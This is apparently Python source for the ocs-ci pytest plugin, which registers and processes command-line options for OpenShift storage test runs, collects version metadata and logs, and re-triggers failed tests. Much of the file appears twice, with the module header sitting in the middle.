            OCP version to be used for deployment. This version will be used for
            load file from conf/ocp_version/ocp-VERSION-config.yaml. You can use
            for example those values:
            4.2: for nightly 4.2 OCP build
            4.2-ga: for latest GAed 4.2 OCP build
            4.2-ga-minus1: for latest GAed 4.2 build - 1
            """,
        )
        parser.addoption(
            f"--ocs-registry-image{suffix}",
            dest=f"ocs_registry_image{suffix}",
            help=(
                "ocs registry image to be used for deployment "
                "(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.2)"
            ),
        )
        parser.addoption(
            f"--osd-size{suffix}",
            dest=f"osd_size{suffix}",
            type=int,
            help="OSD size in GB - for 2TB pass 2048, for 0.5TB pass 512 and so on.",
        )
def pytest_addoption(parser):
    """
    Add necessary options to initialize OCS CI library.

    Args:
        parser: pytest options parser the run-ci options are registered on.
    """
    # Handle only cluster specific options from the below call
    # Rest of the options which are general, will be handled here itself
    _pytest_addoption_cluster_specific(parser)
    parser.addoption(
        "--teardown",
        dest="teardown",
        action="store_true",
        default=False,
        help="If provided the test cluster will be destroyed after tests complete",
    )
    parser.addoption(
        "--deploy",
        dest="deploy",
        action="store_true",
        default=False,
        help="If provided a test cluster will be deployed on AWS to use for testing",
    )
    parser.addoption(
        "--live-deploy",
        dest="live_deploy",
        action="store_true",
        default=False,
        help="Deploy OCS from live registry like a customer",
    )
    parser.addoption(
        "--email",
        dest="email",
        help="Email ID to send results",
    )
    parser.addoption(
        "--squad-analysis",
        dest="squad_analysis",
        action="store_true",
        default=False,
        help="Include Squad Analysis to email report.",
    )
    parser.addoption(
        "--collect-logs",
        # NOTE: this dest deliberately keeps the hyphen; it is retrieved as
        # get_cli_param(config, "collect-logs") in process_cluster_cli_params,
        # so renaming it to an underscore would break that lookup.
        dest="collect-logs",
        action="store_true",
        default=False,
        help="Collect OCS logs when test case failed",
    )
    parser.addoption(
        "--collect-logs-on-success-run",
        dest="collect_logs_on_success_run",
        action="store_true",
        default=False,
        help="Collect must gather logs at the end of the execution (also when no failure in the tests)",
    )
    parser.addoption(
        "--io-in-bg",
        dest="io_in_bg",
        action="store_true",
        default=False,
        help="Run IO in the background",
    )
    parser.addoption(
        "--io-load",
        dest="io_load",
        help="IOs throughput target percentage. Value should be between 0 to 100",
    )
    parser.addoption(
        "--log-cluster-utilization",
        dest="log_cluster_utilization",
        action="store_true",
        help="Enable logging of cluster utilization metrics every 10 seconds",
    )
    parser.addoption(
        "--upgrade-ocs-version",
        dest="upgrade_ocs_version",
        help="ocs version to upgrade (e.g. 4.3)",
    )
    parser.addoption(
        "--upgrade-ocp-version",
        dest="upgrade_ocp_version",
        help="""
        OCP version to upgrade to. This version will be used to
        load file from conf/ocp_version/ocp-VERSION-config.yaml.
        For example:
        4.5 (for nightly 4.5 OCP build)
        4.5-ga (for latest GAed 4.5 OCP build)
        """,
    )
    parser.addoption(
        "--upgrade-ocp-image",
        dest="upgrade_ocp_image",
        help="""
        OCP image to upgrade to. This image string will be split on ':' to
        determine the image source and the specified tag to use.
        (e.g. quay.io/openshift-release-dev/ocp-release:4.6.0-x86_64)
        """,
    )
    parser.addoption(
        "--ocp-installer-version",
        dest="ocp_installer_version",
        help="""
        Specific OCP installer version to be used for deployment. This option
        will generally be used for non-GA or nightly builds. (e.g. 4.5.5).
        This option will overwrite any values set via --ocp-version.
        """,
    )
    parser.addoption(
        "--upgrade-ocs-registry-image",
        dest="upgrade_ocs_registry_image",
        help=(
            "ocs registry image to be used for upgrade "
            "(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.3)"
        ),
    )
    parser.addoption(
        "--flexy-env-file", dest="flexy_env_file", help="Path to flexy environment file"
    )
    parser.addoption(
        "--csv-change",
        dest="csv_change",
        help=(
            "Pattern or string to change in the CSV. Should contain the value to replace "
            "from and the value to replace to, separated by '::'"
        ),
    )
    parser.addoption(
        "--dev-mode",
        dest="dev_mode",
        action="store_true",
        default=False,
        help=(
            "Runs in development mode. It skips few checks like collecting "
            "versions, collecting logs, etc"
        ),
    )
    parser.addoption(
        "--ceph-debug",
        dest="ceph_debug",
        action="store_true",
        default=False,
        help=(
            "For OCS cluster deployment with Ceph configured in debug mode. Available for OCS 4.7 and above"
        ),
    )
    parser.addoption(
        "--skip-download-client",
        dest="skip_download_client",
        action="store_true",
        default=False,
        help="Skip the openshift client download step or not",
    )
    parser.addoption(
        "--disable-components",
        dest="disable_components",
        action="append",
        choices=["rgw", "cephfs", "noobaa", "blockpools"],
        help=("disable deployment of ocs component:rgw, cephfs, noobaa, blockpools."),
    )
    parser.addoption(
        "--re-trigger-failed-tests",
        dest="re_trigger_failed_tests",
        help="""
        Path to the xunit file for xml junit report from the previous execution.
        If the file is provided, the execution will remove all the test cases
        which passed and will run only those test cases which were skipped /
        failed / or had error in the provided report.
        """,
    )
    parser.addoption(
        "--default-cluster-context-index",
        dest="default_cluster_context_index",
        default=0,
        help="""
        Sets the default index of the cluster whose context needs to be
        loaded when run-ci starts
        """,
    )
def pytest_configure(config):
    """
    Load config files, and initialize ocs-ci library.

    Args:
        config (pytest.config): Pytest config object
    """
    set_log_level(config)
    # Somewhat hacky but this lets us differentiate between run-ci executions
    # and plain pytest unit test executions
    ocscilib_module = "ocs_ci.framework.pytest_customization.ocscilib"
    if ocscilib_module not in config.getoption("-p"):
        return
    for i in range(ocsci_config.nclusters):
        log.info(f"Pytest configure switching to: cluster={i}")
        ocsci_config.switch_ctx(i)
        if not (config.getoption("--help") or config.getoption("collectonly")):
            process_cluster_cli_params(config)
            config_file = os.path.expanduser(
                os.path.join(
                    ocsci_config.RUN["log_dir"],
                    # BUGFIX: the inner subscript must use single quotes --
                    # reusing the f-string's double quotes is a SyntaxError
                    # on Python < 3.12.
                    f"run-{ocsci_config.RUN['run_id']}-cl{i}-config.yaml",
                )
            )
            dump_config_to_file(config_file)
            log.info(
                f"Dump of the consolidated config file is located here: "
                f"{config_file}"
            )
            # Add OCS related versions to the html report and remove
            # extraneous metadata
            markers_arg = config.getoption("-m")
            # add logs url
            logs_url = ocsci_config.RUN.get("logs_url")
            if logs_url:
                config._metadata["Logs URL"] = logs_url
            if ocsci_config.RUN["cli_params"].get("teardown") or (
                "deployment" in markers_arg
                and ocsci_config.RUN["cli_params"].get("deploy")
            ):
                log.info(
                    "Skipping versions collecting because: Deploy or destroy of "
                    "cluster is performed."
                )
                continue
            elif ocsci_config.ENV_DATA["skip_ocs_deployment"]:
                log.info(
                    "Skipping version collection because we skipped "
                    "the OCS deployment"
                )
                continue
            elif ocsci_config.RUN["cli_params"].get("dev_mode"):
                log.info("Running in development mode")
                continue
            # remove extraneous metadata
            for extra_meta in ["Python", "Packages", "Plugins", "Platform"]:
                if config._metadata.get(extra_meta):
                    del config._metadata[extra_meta]
            config._metadata["Test Run Name"] = get_testrun_name()
            gather_version_info_for_report(config)
    # switch the configuration context back to the default cluster
    ocsci_config.switch_default_cluster_ctx()
def gather_version_info_for_report(config):
    """
    This function gathers all version related info used for the report.

    Any failure is logged and swallowed deliberately (best effort): missing
    version info must not abort the test run, only produce a warning.

    Args:
        config (pytest.config): Pytest config object
    """
    gather_version_completed = False
    try:
        # add cluster version
        clusterversion = get_cluster_version()
        config._metadata["Cluster Version"] = clusterversion
        # add ceph version
        if not ocsci_config.ENV_DATA["mcg_only_deployment"]:
            ceph_version = get_ceph_version()
            config._metadata["Ceph Version"] = ceph_version
        # add csi versions
        csi_versions = get_csi_versions()
        config._metadata["cephfsplugin"] = csi_versions.get("csi-cephfsplugin")
        config._metadata["rbdplugin"] = csi_versions.get("csi-rbdplugin")
        # add ocs operator version
        config._metadata["OCS operator"] = get_ocs_build_number()
        # per-image versions; the operator itself was already reported above
        # (removed redundant ``mods = {}`` that was immediately overwritten)
        mods = get_version_info(namespace=ocsci_config.ENV_DATA["cluster_namespace"])
        skip_list = ["ocs-operator"]
        for key, val in mods.items():
            if key not in skip_list:
                config._metadata[key] = val.rsplit("/")[-1]
        gather_version_completed = True
    except ResourceNotFoundError:
        log.exception("Problem occurred when looking for some resource!")
    except FileNotFoundError:
        log.exception("File not found!")
    except CommandFailed:
        log.exception("Failed to execute command!")
    except Exception:
        log.exception("Failed to gather version info!")
    finally:
        if not gather_version_completed:
            # BUGFIX: the two literals previously concatenated to "mightnot";
            # a trailing space restores the intended message.
            log.warning(
                "Failed to gather version details! The report of version might "
                "not be complete!"
            )
def get_cli_param(config, name_of_param, default=None):
    """
    Helper that reads a cli parameter and records it in the RUN section
    under ``cli_params``.

    Args:
        config (pytest.config): Pytest config object
        name_of_param (str): cli parameter name
        default (any): default value of parameter (default: None)

    Returns:
        any: value of cli parameter or default value
    """
    run_cli_params = ocsci_config.RUN["cli_params"]
    value = config.getoption(name_of_param, default=default)
    run_cli_params[name_of_param] = value
    return value
def process_cluster_cli_params(config):
    """
    Process cluster related cli parameters
    Args:
        config (pytest.config): Pytest config object
    Raises:
        ClusterPathNotProvidedError: If a cluster path is missing
        ClusterNameNotProvidedError: If a cluster name is missing
        ClusterNameLengthError: If a cluster name is too short or too long
    """
    # In multicluster mode each cluster-specific option carries a 1-based
    # numeric suffix; single-cluster runs use the plain option name.
    suffix = ocsci_config.cur_index + 1 if ocsci_config.multicluster else ""
    cluster_path = get_cli_param(config, f"cluster_path{suffix}")
    if not cluster_path:
        raise ClusterPathNotProvidedError()
    cluster_path = os.path.expanduser(cluster_path)
    if not os.path.exists(cluster_path):
        os.makedirs(cluster_path)
    # Importing here cause once the function is invoked we have already config
    # loaded, so this is OK to import once you sure that config is loaded.
    from ocs_ci.ocs.openshift_ops import OCP
    # Point both the OCP helper and RUN["kubeconfig"] at the kubeconfig file
    # inside the cluster directory.
    OCP.set_kubeconfig(
        os.path.join(cluster_path, ocsci_config.RUN["kubeconfig_location"])
    )
    ocsci_config.RUN.update(
        {
            "kubeconfig": os.path.join(
                cluster_path, ocsci_config.RUN["kubeconfig_location"]
            )
        }
    )
    cluster_name = get_cli_param(config, f"cluster_name{suffix}")
    ocsci_config.RUN["cli_params"]["teardown"] = get_cli_param(
        config, "teardown", default=False
    )
    ocsci_config.RUN["cli_params"]["deploy"] = get_cli_param(
        config, "deploy", default=False
    )
    # CLI flag wins; otherwise fall back to value already set in DEPLOYMENT.
    live_deployment = get_cli_param(
        config, "live_deploy", default=False
    ) or ocsci_config.DEPLOYMENT.get("live_deployment", False)
    ocsci_config.DEPLOYMENT["live_deployment"] = live_deployment
    if live_deployment:
        update_live_must_gather_image()
    io_in_bg = get_cli_param(config, "io_in_bg")
    if io_in_bg:
        ocsci_config.RUN["io_in_bg"] = True
    io_load = get_cli_param(config, "io_load")
    if io_load:
        ocsci_config.RUN["io_load"] = io_load
    log_utilization = get_cli_param(config, "log_cluster_utilization")
    if log_utilization:
        ocsci_config.RUN["log_utilization"] = True
    upgrade_ocs_version = get_cli_param(config, "upgrade_ocs_version")
    if upgrade_ocs_version:
        ocsci_config.UPGRADE["upgrade_ocs_version"] = upgrade_ocs_version
    ocs_registry_image = get_cli_param(config, f"ocs_registry_image{suffix}")
    if ocs_registry_image:
        ocsci_config.DEPLOYMENT["ocs_registry_image"] = ocs_registry_image
    upgrade_ocs_registry_image = get_cli_param(config, "upgrade_ocs_registry_image")
    if upgrade_ocs_registry_image:
        ocsci_config.UPGRADE["upgrade_ocs_registry_image"] = upgrade_ocs_registry_image
    ocsci_config.ENV_DATA["cluster_name"] = cluster_name
    ocsci_config.ENV_DATA["cluster_path"] = cluster_path
    get_cli_param(config, "collect-logs")
    # Cluster name is mandatory (and length-checked) only when deploying;
    # otherwise it may be derived from metadata in the cluster directory.
    if ocsci_config.RUN.get("cli_params").get("deploy"):
        if not cluster_name:
            raise ClusterNameNotProvidedError()
        if (
            len(cluster_name) < CLUSTER_NAME_MIN_CHARACTERS
            or len(cluster_name) > CLUSTER_NAME_MAX_CHARACTERS
        ):
            raise ClusterNameLengthError(cluster_name)
    elif not cluster_name:
        try:
            ocsci_config.ENV_DATA["cluster_name"] = get_cluster_name(cluster_path)
        except FileNotFoundError:
            raise ClusterNameNotProvidedError()
    if get_cli_param(config, "email") and not get_cli_param(config, "--html"):
        pytest.exit("--html option must be provided to send email reports")
    get_cli_param(config, "squad_analysis")
    get_cli_param(config, "-m")
    osd_size = get_cli_param(config, "--osd-size")
    if osd_size:
        ocsci_config.ENV_DATA["device_size"] = osd_size
    # Version options translate into extra config files layered on top of the
    # currently loaded configuration.
    ocp_version = get_cli_param(config, "--ocp-version")
    if ocp_version:
        version_config_file = f"ocp-{ocp_version}-config.yaml"
        version_config_file_path = os.path.join(
            OCP_VERSION_CONF_DIR, version_config_file
        )
        load_config_file(version_config_file_path)
    upgrade_ocp_version = get_cli_param(config, "--upgrade-ocp-version")
    if upgrade_ocp_version:
        version_config_file = f"ocp-{upgrade_ocp_version}-upgrade.yaml"
        version_config_file_path = os.path.join(
            OCP_VERSION_CONF_DIR, version_config_file
        )
        load_config_file(version_config_file_path)
    upgrade_ocp_image = get_cli_param(config, "--upgrade-ocp-image")
    if upgrade_ocp_image:
        # Image is "<source>:<tag>"; rsplit so the source may contain colons.
        ocp_image = upgrade_ocp_image.rsplit(":", 1)
        ocsci_config.UPGRADE["ocp_upgrade_path"] = ocp_image[0]
        ocsci_config.UPGRADE["ocp_upgrade_version"] = ocp_image[1]
    ocp_installer_version = get_cli_param(config, "--ocp-installer-version")
    if ocp_installer_version:
        ocsci_config.DEPLOYMENT["installer_version"] = ocp_installer_version
        ocsci_config.RUN["client_version"] = ocp_installer_version
    csv_change = get_cli_param(config, "--csv-change")
    if csv_change:
        # Expected format: "<from>::<to>"
        csv_change = csv_change.split("::")
        ocsci_config.DEPLOYMENT["csv_change_from"] = csv_change[0]
        ocsci_config.DEPLOYMENT["csv_change_to"] = csv_change[1]
    collect_logs_on_success_run = get_cli_param(config, "collect_logs_on_success_run")
    if collect_logs_on_success_run:
        ocsci_config.REPORTING["collect_logs_on_success_run"] = True
    get_cli_param(config, "dev_mode")
    ceph_debug = get_cli_param(config, "ceph_debug")
    if ceph_debug:
        ocsci_config.DEPLOYMENT["ceph_debug"] = True
    skip_download_client = get_cli_param(config, "skip_download_client")
    if skip_download_client:
        ocsci_config.DEPLOYMENT["skip_download_client"] = True
    re_trigger_failed_tests = get_cli_param(config, "--re-trigger-failed-tests")
    if re_trigger_failed_tests:
        ocsci_config.RUN["re_trigger_failed_tests"] = os.path.expanduser(
            re_trigger_failed_tests
        )
def pytest_collection_modifyitems(session, config, items):
    """
    Add Polarion ID property to test cases that are marked with one.

    When --re-trigger-failed-tests points at a junit XML report from a
    previous run, also drop every collected test that passed in that report,
    so only failed / skipped / errored cases run again.
    """
    re_trigger_failed_tests = ocsci_config.RUN.get("re_trigger_failed_tests")
    if re_trigger_failed_tests:
        junit_report = JUnitXml.fromfile(re_trigger_failed_tests)
        cases_to_re_trigger = []
        for suite in junit_report:
            # A truthy result element means the case did NOT pass cleanly.
            cases_to_re_trigger += [_case.name for _case in suite if _case.result]
    # Iterate over a copy so removing from the live list is safe.
    for item in items[:]:
        if re_trigger_failed_tests and item.name not in cases_to_re_trigger:
            log.info(
                f"Test case: {item.name} will be removed from execution, "
                "because of you provided --re-trigger-failed-tests parameter "
                "and this test passed in previous execution from the report!"
            )
            items.remove(item)
        # NOTE(review): removed items still get the polarion property below;
        # harmless, but a `continue` after removal would be cleaner.
        try:
            marker = item.get_closest_marker(name="polarion_id")
            if marker:
                polarion_id = marker.args[0]
                if polarion_id:
                    item.user_properties.append(("polarion-testcase-id", polarion_id))
        except IndexError:
            # Marker present but without a positional argument.
            log.warning(
                f"polarion_id marker found with no value for "
                f"{item.name} in {item.fspath}",
                exc_info=True,
            )
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
    """
    Hook wrapper that inspects every test report and, on failure, collects
    OCS logs, Prometheus metrics and performance stats as configured.
    """
    # Let pytest build the report first, then post-process it.
    outcome = yield
    rep = outcome.get_result()
    # we only look at actual failing test calls, not setup/teardown
    if rep.failed and ocsci_config.RUN.get("cli_params").get("collect-logs"):
        test_case_name = item.name
        # Full OCP log collection only for the "call" phase failure.
        ocp_logs_collection = True if rep.when == "call" else False
        mcg = (
            True if any(x in item.location[0] for x in ["mcg", "ecosystem"]) else False
        )
        try:
            if not ocsci_config.RUN.get("is_ocp_deployment_failed"):
                collect_ocs_logs(
                    dir_name=test_case_name, ocp=ocp_logs_collection, mcg=mcg
                )
        except Exception:
            # Log collection is best effort; never fail the report hook.
            log.exception("Failed to collect OCS logs")
    # Collect Prometheus metrics if specified in gather_metrics_on_fail marker
    if (
        (rep.when == "setup" or rep.when == "call")
        and rep.failed
        and item.get_closest_marker("gather_metrics_on_fail")
    ):
        metrics = item.get_closest_marker("gather_metrics_on_fail").args
        try:
            collect_prometheus_metrics(
                metrics, f"{item.name}-{call.when}", call.start, call.stop
            )
        except Exception:
            log.exception("Failed to collect prometheus metrics")
    # Get the performance metrics when tests fails for scale or performance tag
    # Lazy import; presumably avoids import cost/cycle at module load — confirm.
    from ocs_ci.helpers.helpers import collect_performance_stats
    if (
        (rep.when == "setup" or rep.when == "call")
        and rep.failed
        and (item.get_closest_marker("scale") or item.get_closest_marker("performance"))
    ):
        test_case_name = item.name
        try:
            collect_performance_stats(test_case_name)
        except Exception:
            log.exception("Failed to collect performance stats")
def set_log_level(config):
    """
    Adjust this module's logger level from the ``log_cli_level`` ini option.

    Falls back to INFO when the option is unset or empty.

    Args:
        config (pytest.config): Pytest config object
    """
    configured_level = config.getini("log_cli_level")
    if not configured_level:
        configured_level = "INFO"
    log.setLevel(logging.getLevelName(configured_level))
"""
This is plugin for all the plugins/hooks related to OCS-CI and its
configuration.
The basic configuration is done in run_ocsci.py module casue we need to load
all the config before pytest run. This run_ocsci.py is just a wrapper for
pytest which proccess config and passes all params to pytest.
"""
import logging
import os
import pytest
from junitparser import JUnitXml
from ocs_ci.framework import config as ocsci_config
from ocs_ci.framework.exceptions import (
ClusterNameLengthError,
ClusterNameNotProvidedError,
ClusterPathNotProvidedError,
)
from ocs_ci.ocs.constants import (
CLUSTER_NAME_MAX_CHARACTERS,
CLUSTER_NAME_MIN_CHARACTERS,
LOG_FORMAT,
OCP_VERSION_CONF_DIR,
)
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceNotFoundError,
)
from ocs_ci.ocs.resources.ocs import get_version_info
from ocs_ci.ocs.utils import collect_ocs_logs, collect_prometheus_metrics
from ocs_ci.utility.utils import (
dump_config_to_file,
get_ceph_version,
get_cluster_name,
get_cluster_version,
get_csi_versions,
get_ocs_build_number,
get_testrun_name,
load_config_file,
)
from ocs_ci.utility.reporting import update_live_must_gather_image
# Public pytest plugin entry points exported by this module.
__all__ = [
    "pytest_addoption",
]
# Module logger with the shared ocs-ci log format attached to stderr.
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(LOG_FORMAT))
log.addHandler(handler)
def _pytest_addoption_cluster_specific(parser):
    """
    Handle multicluster options here
    We will add options which will have suffix number same as its cluster number
    i.e `--cluster1 --cluster-name xyz --cluster-path /a/b/c --ocsci-conf /path/to/c1
    --ocsci-conf /path/to/c2...` will get translated to `--cluster1 --cluster-name1 xyz
    --cluster-path1 /a/b/c --ocsci-conf1 /path/to/c1 --ocsci-conf1 /path/to/c2`
    Rest of the general run-ci options will be handled by pytest_addoption
    """
    add_common_ocsci_conf = False
    for i in range(ocsci_config.nclusters):
        # If it's not multicluster then no suffix will be added
        suffix = i + 1 if ocsci_config.multicluster else ""
        # Register the suffix-less --ocsci-conf exactly once in multicluster
        # mode, so a common config can still be passed for all clusters.
        if not add_common_ocsci_conf and ocsci_config.multicluster:
            parser.addoption(
                "--ocsci-conf",
                dest="ocsci_conf",
                action="append",
                help="Path to config file of OCS CI",
            )
            add_common_ocsci_conf = True
        parser.addoption(
            f"--ocsci-conf{suffix}",
            dest=f"ocsci_conf{suffix}",
            action="append",
            help="Path to config file of OCS CI",
        )
        parser.addoption(
            f"--cluster-path{suffix}",
            dest=f"cluster_path{suffix}",
            help="Path to cluster directory",
        )
        parser.addoption(
            f"--cluster-name{suffix}",
            dest=f"cluster_name{suffix}",
            help="Name of cluster",
        )
        parser.addoption(
            f"--ocs-version{suffix}",
            dest=f"ocs_version{suffix}",
            help="ocs version for which ocs-ci to be run",
        )
        parser.addoption(
            f"--ocp-version{suffix}",
            dest=f"ocp_version{suffix}",
            help="""
            OCP version to be used for deployment. This version will be used for
            load file from conf/ocp_version/ocp-VERSION-config.yaml. You can use
            for example those values:
            4.2: for nightly 4.2 OCP build
            4.2-ga: for latest GAed 4.2 OCP build
            4.2-ga-minus1: for latest GAed 4.2 build - 1
            """,
        )
        parser.addoption(
            f"--ocs-registry-image{suffix}",
            dest=f"ocs_registry_image{suffix}",
            help=(
                "ocs registry image to be used for deployment "
                "(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.2)"
            ),
        )
        parser.addoption(
            f"--osd-size{suffix}",
            dest=f"osd_size{suffix}",
            type=int,
            help="OSD size in GB - for 2TB pass 2048, for 0.5TB pass 512 and so on.",
        )
def pytest_addoption(parser):
    """
    Add necessary options to initialize OCS CI library.

    Cluster-specific (possibly suffixed) options are registered by
    ``_pytest_addoption_cluster_specific``; everything below is a general
    run-ci option shared by all clusters.
    """
    # Handle only cluster specific options from the below call
    # Rest of the options which are general, will be handled here itself
    _pytest_addoption_cluster_specific(parser)
    parser.addoption(
        "--teardown",
        dest="teardown",
        action="store_true",
        default=False,
        help="If provided the test cluster will be destroyed after tests complete",
    )
    parser.addoption(
        "--deploy",
        dest="deploy",
        action="store_true",
        default=False,
        help="If provided a test cluster will be deployed on AWS to use for testing",
    )
    parser.addoption(
        "--live-deploy",
        dest="live_deploy",
        action="store_true",
        default=False,
        help="Deploy OCS from live registry like a customer",
    )
    parser.addoption(
        "--email",
        dest="email",
        help="Email ID to send results",
    )
    parser.addoption(
        "--squad-analysis",
        dest="squad_analysis",
        action="store_true",
        default=False,
        help="Include Squad Analysis to email report.",
    )
    # NOTE: dest intentionally keeps the hyphen ("collect-logs"); callers look
    # it up via get_cli_param(config, "collect-logs").
    parser.addoption(
        "--collect-logs",
        dest="collect-logs",
        action="store_true",
        default=False,
        help="Collect OCS logs when test case failed",
    )
    parser.addoption(
        "--collect-logs-on-success-run",
        dest="collect_logs_on_success_run",
        action="store_true",
        default=False,
        help="Collect must gather logs at the end of the execution (also when no failure in the tests)",
    )
    parser.addoption(
        "--io-in-bg",
        dest="io_in_bg",
        action="store_true",
        default=False,
        help="Run IO in the background",
    )
    parser.addoption(
        "--io-load",
        dest="io_load",
        help="IOs throughput target percentage. Value should be between 0 to 100",
    )
    parser.addoption(
        "--log-cluster-utilization",
        dest="log_cluster_utilization",
        action="store_true",
        help="Enable logging of cluster utilization metrics every 10 seconds",
    )
    parser.addoption(
        "--upgrade-ocs-version",
        dest="upgrade_ocs_version",
        help="ocs version to upgrade (e.g. 4.3)",
    )
    parser.addoption(
        "--upgrade-ocp-version",
        dest="upgrade_ocp_version",
        help="""
        OCP version to upgrade to. This version will be used to
        load file from conf/ocp_version/ocp-VERSION-config.yaml.
        For example:
        4.5 (for nightly 4.5 OCP build)
        4.5-ga (for latest GAed 4.5 OCP build)
        """,
    )
    parser.addoption(
        "--upgrade-ocp-image",
        dest="upgrade_ocp_image",
        help="""
        OCP image to upgrade to. This image string will be split on ':' to
        determine the image source and the specified tag to use.
        (e.g. quay.io/openshift-release-dev/ocp-release:4.6.0-x86_64)
        """,
    )
    parser.addoption(
        "--ocp-installer-version",
        dest="ocp_installer_version",
        help="""
        Specific OCP installer version to be used for deployment. This option
        will generally be used for non-GA or nightly builds. (e.g. 4.5.5).
        This option will overwrite any values set via --ocp-version.
        """,
    )
    parser.addoption(
        "--upgrade-ocs-registry-image",
        dest="upgrade_ocs_registry_image",
        help=(
            "ocs registry image to be used for upgrade "
            "(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.3)"
        ),
    )
    parser.addoption(
        "--flexy-env-file", dest="flexy_env_file", help="Path to flexy environment file"
    )
    parser.addoption(
        "--csv-change",
        dest="csv_change",
        help=(
            "Pattern or string to change in the CSV. Should contain the value to replace "
            "from and the value to replace to, separated by '::'"
        ),
    )
    parser.addoption(
        "--dev-mode",
        dest="dev_mode",
        action="store_true",
        default=False,
        help=(
            "Runs in development mode. It skips few checks like collecting "
            "versions, collecting logs, etc"
        ),
    )
    parser.addoption(
        "--ceph-debug",
        dest="ceph_debug",
        action="store_true",
        default=False,
        help=(
            "For OCS cluster deployment with Ceph configured in debug mode. Available for OCS 4.7 and above"
        ),
    )
    parser.addoption(
        "--skip-download-client",
        dest="skip_download_client",
        action="store_true",
        default=False,
        help="Skip the openshift client download step or not",
    )
    parser.addoption(
        "--disable-components",
        dest="disable_components",
        action="append",
        choices=["rgw", "cephfs", "noobaa", "blockpools"],
        help=("disable deployment of ocs component:rgw, cephfs, noobaa, blockpools."),
    )
    parser.addoption(
        "--re-trigger-failed-tests",
        dest="re_trigger_failed_tests",
        help="""
        Path to the xunit file for xml junit report from the previous execution.
        If the file is provided, the execution will remove all the test cases
        which passed and will run only those test cases which were skipped /
        failed / or had error in the provided report.
        """,
    )
    parser.addoption(
        "--default-cluster-context-index",
        dest="default_cluster_context_index",
        default=0,
        help="""
        Sets the default index of the cluster whose context needs to be
        loaded when run-ci starts
        """,
    )
def pytest_configure(config):
    """
    Load config files, and initialize ocs-ci library.

    Iterates over all configured clusters, switching the ocs-ci config
    context for each one, processing its CLI params, dumping the consolidated
    config to a file and collecting version metadata for the HTML report.

    Args:
        config (pytest.config): Pytest config object
    """
    set_log_level(config)
    # Somewhat hacky but this lets us differentiate between run-ci executions
    # and plain pytest unit test executions
    ocscilib_module = "ocs_ci.framework.pytest_customization.ocscilib"
    if ocscilib_module not in config.getoption("-p"):
        return
    for i in range(ocsci_config.nclusters):
        log.info(f"Pytest configure switching to: cluster={i}")
        ocsci_config.switch_ctx(i)
        if not (config.getoption("--help") or config.getoption("collectonly")):
            process_cluster_cli_params(config)
            config_file = os.path.expanduser(
                os.path.join(
                    ocsci_config.RUN["log_dir"],
                    f"run-{ocsci_config.RUN['run_id']}-cl{i}-config.yaml",
                )
            )
            dump_config_to_file(config_file)
            log.info(
                f"Dump of the consolidated config file is located here: "
                f"{config_file}"
            )
            # Add OCS related versions to the html report and remove
            # extraneous metadata
            markers_arg = config.getoption("-m")
            # add logs url
            logs_url = ocsci_config.RUN.get("logs_url")
            if logs_url:
                config._metadata["Logs URL"] = logs_url
            # Version collection is skipped when the run only deploys or
            # destroys a cluster, skips OCS deployment, or runs in dev mode.
            if ocsci_config.RUN["cli_params"].get("teardown") or (
                "deployment" in markers_arg
                and ocsci_config.RUN["cli_params"].get("deploy")
            ):
                log.info(
                    "Skipping versions collecting because: Deploy or destroy of "
                    "cluster is performed."
                )
                continue
            elif ocsci_config.ENV_DATA["skip_ocs_deployment"]:
                log.info(
                    "Skipping version collection because we skipped "
                    "the OCS deployment"
                )
                continue
            elif ocsci_config.RUN["cli_params"].get("dev_mode"):
                log.info("Running in development mode")
                continue
            # remove extraneous metadata
            for extra_meta in ["Python", "Packages", "Plugins", "Platform"]:
                if config._metadata.get(extra_meta):
                    del config._metadata[extra_meta]
            config._metadata["Test Run Name"] = get_testrun_name()
            gather_version_info_for_report(config)
    # switch the configuration context back to the default cluster
    ocsci_config.switch_default_cluster_ctx()
def gather_version_info_for_report(config):
    """
    This function gather all version related info used for report.

    Collected versions (cluster, Ceph, CSI plugins, OCS operator and other
    deployment components) are stored in ``config._metadata`` so that they
    appear in the HTML report. All failures are logged but never raised, so
    report generation can continue with partial data.

    Args:
        config (pytest.config): Pytest config object
    """
    gather_version_completed = False
    try:
        # add cluster version
        clusterversion = get_cluster_version()
        config._metadata["Cluster Version"] = clusterversion
        # add ceph version (not available on MCG-only deployments)
        if not ocsci_config.ENV_DATA["mcg_only_deployment"]:
            ceph_version = get_ceph_version()
            config._metadata["Ceph Version"] = ceph_version
        # add csi versions
        csi_versions = get_csi_versions()
        config._metadata["cephfsplugin"] = csi_versions.get("csi-cephfsplugin")
        config._metadata["rbdplugin"] = csi_versions.get("csi-rbdplugin")
        # add ocs operator version
        config._metadata["OCS operator"] = get_ocs_build_number()
        # add versions of the remaining components, keeping only the image tag
        mods = get_version_info(namespace=ocsci_config.ENV_DATA["cluster_namespace"])
        skip_list = ["ocs-operator"]
        for key, val in mods.items():
            if key not in skip_list:
                config._metadata[key] = val.rsplit("/")[-1]
        gather_version_completed = True
    except ResourceNotFoundError:
        log.exception("Problem occurred when looking for some resource!")
    except FileNotFoundError:
        log.exception("File not found!")
    except CommandFailed:
        log.exception("Failed to execute command!")
    except Exception:
        log.exception("Failed to gather version info!")
    finally:
        if not gather_version_completed:
            # Fixed missing space between the two concatenated string parts
            # (previously rendered as "mightnot be complete!").
            log.warning(
                "Failed to gather version details! The report of version might "
                "not be complete!"
            )
def get_cli_param(config, name_of_param, default=None):
    """
    Fetch a CLI option value from pytest and record it under
    ``RUN["cli_params"]`` in the ocs-ci configuration.

    Args:
        config (pytest.config): Pytest config object
        name_of_param (str): cli parameter name
        default (any): default value of parameter (default: None)

    Returns:
        any: value of cli parameter or default value
    """
    value = config.getoption(name_of_param, default=default)
    ocsci_config.RUN["cli_params"][name_of_param] = value
    return value
def process_cluster_cli_params(config):
    """
    Process cluster related cli parameters
    Args:
        config (pytest.config): Pytest config object
    Raises:
        ClusterPathNotProvidedError: If a cluster path is missing
        ClusterNameNotProvidedError: If a cluster name is missing
        ClusterNameLengthError: If a cluster name is too short or too long
    """
    # In multicluster mode each cluster-specific option carries a 1-based
    # numeric suffix; single-cluster runs use the plain option name.
